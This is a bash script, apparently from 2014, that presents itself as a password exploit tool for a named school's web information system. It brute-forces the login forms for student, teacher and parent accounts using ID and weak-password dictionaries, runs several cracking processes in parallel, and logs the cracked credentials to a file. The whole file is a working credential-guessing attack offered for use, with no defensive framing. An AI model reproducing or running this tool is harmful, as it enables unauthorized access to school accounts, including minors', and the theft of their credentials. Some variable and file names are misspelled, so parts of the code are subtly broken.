#!/bin/bash
# cgspasswd - Country Gardern School Password exploit tool
# cgspasswd is a free software, maintaince by MagicNAT Networing
# Version 0.6 (C) MagicNAT Networking
#
# MUTIL-PROCESS HELP
#
# The mutiple process function is currently in development. You can still use it. However it
# might cause some problems.
#
# To use MP mode, create a dir with you id dict or password dict in it, cgspasswd will start
# different process for each dict files in it.
#
# DEFINATIONS
#
# id: The id of student, teacher, or parent
# passwd: The passwd of student, teacher, or parent
# type: The type of id, could be tea, stu, or par, stand for student, teacher, and parent
# verbose: Set this to get into verbose mode. Showing all password or id tried
#
# cgspasswd CONFIGURE
#
# URL_PREFIX: The prefix of url
# URL_EXTENTION: The extention of url
# WEEK_PASSWD_DICT: The path to week id dict
# ID_DICT: The path to ID dict
# PW_DICT: The path to Password dict
# ID_MP_DICT: The path to ID dict dir when using mutilple process
# PW_MP_DICT: The path to Password dict dir when using mutilple process
# CRACK_MP_PID: The path to pid file of MP cracking work
# WEEKPW_MP_PID: The path to pid file of MP weekpw exploit work
# CRACKED_SAVE: The path to the file to save cracked accounts
URL_PREFIX="http://127.0.0.1:8080/mis/info/tea_info/"
URL_EXTENTION="_Login.asp"
WEEK_PASSWD_DICT="./dicts/wpw.dict"
ID_DICT="./dicts/id.dict"
PW_DICT="./dicts/pw.dict"
ID_MP_DICT="./dicts/ids/"
PW_MP_DICT="./dicts/pws/"
CRACK_MP_PID="./.crack_mp.pid"
WEEKPW_MP_PID="./.weekpw_mp.pid"
CRACKED_SAVE="./cracked.txt"
# help: Get help, usage: help [topic]
function help {
[[ -z $* ]] && echo -e "\n Available topics are: config, chk_login, chk_cracked, weekpw[_mp], crack[_mp]\n mp\n" && return 0
case $1 in
config)
echo -e "\n CGSPASSWD CONFIGURE\n\n URL_PREFIX: The prefix of url\n URL_EXTENTION: The extention of url\n WEEK_PASSWD_DICT: The path to week id dict\n ID_DICT: The path to ID dict\n PW_DICT: The path to Password dict\n ID_MP_DICT: The path to ID dict dir when using mutilple process\n PW_MP_DICT: The path to Password dict dir when using mutilple process\n CRACK_MP_PID: The path to pid file of MP cracking work\n WEEKPW_MP_PID: The path to pid file of MP weekpw exploit work\n CRACKED_SAVE: The path to the file to save cracked accounts\n"
;;
chk_login)
echo -e "\n Check a login, usage: chk_login <id> <passwd> <type>\n id: The id of student, teacher, or parent\n passwd: The passwd of student, teacher, or parent\n type: The type of id, could be tea, stu, or par, stand for student, teacher, \n and parent\n"
;;
chk_cracked)
echo -e "\n Check for the logins that already cracked for failure\n Usage: chk_cracked [verbose]\n verbose: Set this to get into verbose mode. Showing all password or id tried\n"
;;
weekpw|weekpw_mp)
echo -e "\n weekpw[_mp]: Find week passwords with id dict and weekpasswd dict\n Usage: weekpw[_mp] <type> [verbose]\n using '_mp' will enable Mutli-Process, see help mp for more informations.\n type: The type of id, could be tea, stu, or par, stand for student, teacher,\n and parent\n verbose: Set this to get into verbose mode. Showing all password or id tried\n"
;;
crack|crack_mp)
echo -e "\n crack[_mp]: Crack the password of an id.\n Usage: crack[_mp] <id> <type> [verbose]\n using '_mp' will enable Mutli-Process, see help mp for more informations.\n id: The id of student, teacher, or parent\n type: The type of id, could be tea, stu, or par, stand for student, teacher,\n and parent\n verbose: Set this to get into verbose mode. Showing all password or id tried\n"
;;
mp)
echo -e "\n MUTIL-PROCESS HELP\n \n The mutiple process function is currently in development. You can still use \n it. However it might cause some problems. \n\n To use MP mode, create a dir with you id dict or password dict in it, \n cgspasswd will start different process for each dict files in it.\n"
;;
*)
echo -e "\n Help topic $1 not found. $(help)\n"
;;
esac
}
# chk_login: Check a login, usage: chk_login <id> <passwd> <type>
function chk_login {
[[ -z $3 ]] && echo "chk_login: Missing parameters" && return 1
[[ ! -z $(curl --data "t1=$1&t2=$2" $URL_PREFIX$3$URL_EXTENTION 2> /dev/null | grep moved) ]] && echo "true" && return 0
echo "false" && return 1
}
# chk_cracked: Check for the logins that already cracked for failurem, usage: chk_cracked [verbose]
function chk_cracked {
[[ ! -e $CRACKED_SAVE ]] && echo "chk_cracked: Cracked account file $CRACKED_SAVE not exist." && return 1
ACCTLIST=$(cat creaked.txt | sed -e "s/.*Type //g" | sed -e "s/ ID //g" | sed -e "s/ Password //g")
for acct in $ACCTLIST
do
typ=$(echo $acct | awk -F, '{print $1}')
id=$(echo $acct | awk -F, '{print $2}')
passwd=$(echo $acct | awk -F, '{print $3}')
[[ ! -z $1 ]] && echo -n "Tesing login $id($typ) with $passwd... "
[[ $(chk_login $id $passwd $typ) == "false" ]] && echo "Account $id, type $typ, is not able to login with $psswd now." || echo "OK"
done
}
# weekpw: Find week passwords with id dict and weekpasswd dict, usage: weekpw <type> [verbose]
function weekpw {
[[ -z $1 ]] && echo "weekpw: Missing parameters" && return 1
for id in $( cat $ID_DICT )
do
for passwd in $(cat $WEEK_PASSWD_DICT)
do
[[ ! -z $2 ]] && echo "Trying login $id($1) with $passwd... "
[[ $( chk_login $id $passwd $1 ) == "true" ]] && write_cracked $id $passwd $1 && break
done
done
}
# weekpw_mp: Find week passwords with id dicts and weekpasswd dict using MP, usage: weekpw_mp <type> [verbose]
function weekpw_mp {
[[ -z $1 ]] && echo "weekpw_mp: Missing parameters" && return 1
for dict in $(ls $ID_MP_DICT)
do
weekpw_mp_core $ID_MP_DICT$dict $1 $2 &
done
}
# Internal function, core module of weekpw_mp, should not be called by user.
function weekpw_mp_core {
[[ -z $2 ]] && echo "weekpw_mp_core: Missing parameters" && return 1
echo $$ >> $WEEKPW_MP_PID
for id in $(cat $1)
do
for passwd in $(cat $WEEK_PASSWD_DICT)
do
[[ ! -z $3 ]] && echo "Trying login $id($2) with $passwd... "
[[ $( chk_login $id $passwd $2 ) == "true" ]] && write_cracked $id $passwd $2 && break
done
done
cat $WEEKPW_MP_PID | sed -e "s/$$//g" > ._$WEEKPW_MP_PID.tmp
cat ._$WEEKPW_MP_PID.tmp > $WEEKPW_MP_PID
}
# crack: Crack the password of an id, usage: crack <id> <type> [verbose]
function crack {
[[ -z $2 ]] && echo "crack: Missing parameters" && return 1
for passwd in $(cat $PW_DICT)
do
[[ ! -z $3 ]] && echo "Trying login $1($2) with $passwd... "
[[ $( chk_login $1 $passwd $2 ) == "true" ]] && write_cracked $1 $passwd $2 && break
done
}
# crack_mp: Crack the password of an id using MP, usage: crack <id> <type> [verbose]
function crack_mp {
[[ -z $2 ]] && echo "crack_mp: Missing parameters" && return 1
for dict in $(ls $PW_MP_DICT)
do
crack_mp_core $PW_MP_DICT$dict $1 $2 $3 &
done
}
# Internal function, core module of crack_mp, should not be called by user.
function crack_mp_core {
[[ -z $3 ]] && echo "crack_mp_core: Missing parameters" && return 1
echo $$ >> $CRACK_MP_PID
for passwd in $(cat $1)
do
[[ ! -z $4 ]] && echo "Trying login $2($3) with $passwd... "
[[ $( chk_login $2 $passwd $3 ) == "true" ]] && write_cracked $2 $passwd $3 && break
done
cat $CRACK_MP_PID | sed -e "s/$$//g" > ._$CRACK_MP_PID.tmp
cat ._$CRACK_MP_PID.tmp > $CRACK_MP_PID
}
# Internal function, write creaked account, should not be called by user.
function write_cracked {
[[ -z $3 ]] && echo "write_cracked: Missing parameters" && return 1
MSG="[$(date)] Cracked a account, Type $3, ID $1, Password $2"
echo $MSG
echo $MSG >> $CRACKED_SAVE
return 0
}
# Interactive mode
function interactive {
echo "cgspasswd 0.6 (Interactive mode) "
echo "Copyright 2014 MagicNAT Networking"
echo "This is free software with ABSOLUTELY NO WARRANTY."
echo "For help, type help"
while true
do
echo -n "cgspasswd> "; read cmd;
$cmd
done
}
# Init cgspasswd
function cgsinit {
for files in $WEEK_PASSWD_DICT $ID_DICT $PW_DICT $ID_MP_DICT $PW_MP_DICT
do
[[ ! -e $files || -z $URL_PREFIX || -z $URL_EXTENTION ]] && echo "cgsinit: Error while checking config file" && return 1
done
trap 2 15 'exit'
}
# exit cgspasswd
function exit {
echo -n "Sending SIGKILL to all tasks... "
for mp_pid in $CRACK_MP_PID $WEEKPW_MP_PID
do
if [[ -e $mp_pid ]]
then
for pid in $(cat $mp_pid)
do
kill -9 $pid 2> /dev/null > /dev/null
done
rm $mp_pid
fi
done
echo "OK"
echo "Sending SIGKILL to self..."
kill -9 $$
}
# Main function
function main {
[[ $(cgsinit) == "false" ]] && echo "Something wrong, cgspasswd can't start." && return 1
[[ -z $* ]] && interactive
$*
}
# Call main
main $*